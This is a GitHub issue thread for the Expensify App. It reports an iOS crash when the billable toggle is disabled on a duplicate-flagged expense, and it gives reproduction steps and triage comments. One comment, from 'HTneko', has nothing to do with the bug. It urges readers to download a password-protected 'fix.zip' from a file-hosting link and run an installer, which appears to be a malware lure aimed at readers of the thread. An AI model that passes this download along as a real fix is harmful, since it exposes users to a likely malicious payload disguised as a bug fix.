### ISSUE TITLE
[$250]  Expense - App crashes after disabling billable option when expense is flagged as duplicate

### ISSUE THREAD

**Issue by izarutskaya** [Expensify/App#48159]
If you haven’t already, check out our [contributing guidelines](https://github.com/Expensify/ReactNativeChat/blob/main/contributingGuides/CONTRIBUTING.md) for onboarding and email contributors@expensify.com to request to join our Slack channel!
___

**Version Number:** v9.0.25-8
**Reproducible in staging?:** Y
**Reproducible in production?:** N
**If this was caught during regression testing, add the test name, ID and link from TestRail:** https://expensify.testrail.io/index.php?/tests/view/4895077
**Email or phone of affected tester (no customers):** applausetester+kh050806@applause.expensifail.com
**Logs:** https://stackoverflow.com/c/expensify/questions/4856
**Issue reported by:** Applause-Internal team

## Action Performed:
Precondition:
- Billable option is set to Default to billable on Old Dot.

1. Launch New Expensify app.
2. Go to workspace chat.
3. Submit two same expenses with billable option enabled.
4. On Old Dot, disable billable feature.
5. On New Dot, go to transaction thread of any submitted expense.
6. Wait until "Billable no longer valid" violation shows up (might need to visit the page a few times for it to show up) (important).
7. Make sure the expense is flagged as duplicate with Review duplicates button above (important).
8. Tap on the billable toggle to disable it.

## Expected Result:
App will not crash.

## Actual Result:
App crashes after disabling billable option when billable option is no longer valid and expense is flagged as duplicate.

## Workaround:
Unknown

## Platforms:

Which of our officially supported platforms is this issue occurring on?
- [ ] Android: Native
- [ ] Android: mWeb Chrome
- [x] iOS: Native
- [ ] iOS: mWeb Safari
- [ ] MacOS: Chrome / Safari
- [ ] MacOS: Desktop

## Screenshots/Videos

https://github.com/user-attachments/assets/02590215-19e3-480e-9b39-92949929b492

[Bug6584552_1724789167869!New_Expensify-2024-08-28-022109.txt](https://github.com/user-attachments/files/16782054/Bug6584552_1724789167869.New_Expensify-2024-08-28-022109.txt)

</details>

[View all open jobs on GitHub](https://github.com/Expensify/App/issues?q=is%3Aopen+is%3Aissue+label%3A%22Help+Wanted%22)

<details><summary>Upwork Automation - Do Not Edit</summary>
    <ul>
        <li>Upwork Job URL: https://www.upwork.com/jobs/~018fe556ab86ba6c36</li>
        <li>Upwork Job ID: 1828931659495102772</li>
        <li>Last Price Increase: 2024-09-04</li>
    </ul>
</details>

<details><summary>Issue Owner</summary>Current Issue Owner: @allgandalf</details>

**Comment by izarutskaya** [comment]
Production 

https://github.com/user-attachments/assets/1d8f4398-c746-4760-878b-836302a6fb80

**Comment by izarutskaya** [comment]
We think this issue might be related to the #wave-control

**Comment by HTneko** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by stitesExpensify** [comment]
Switching this to cash only deploy blocker since this only happens on iOS

**Comment by puneetlath** [comment]
Demoting since duplicate detection is under beta.

**Comment by johncschuster** [comment]
I've also asked for a retest [here](https://expensify.slack.com/archives/C9YU7BX5M/p1725396865666049)

**Comment by mvtglobally** [comment]
Issue is Not reproducible 

https://github.com/user-attachments/assets/3c2e84f4-9768-4349-806f-be86c9344124
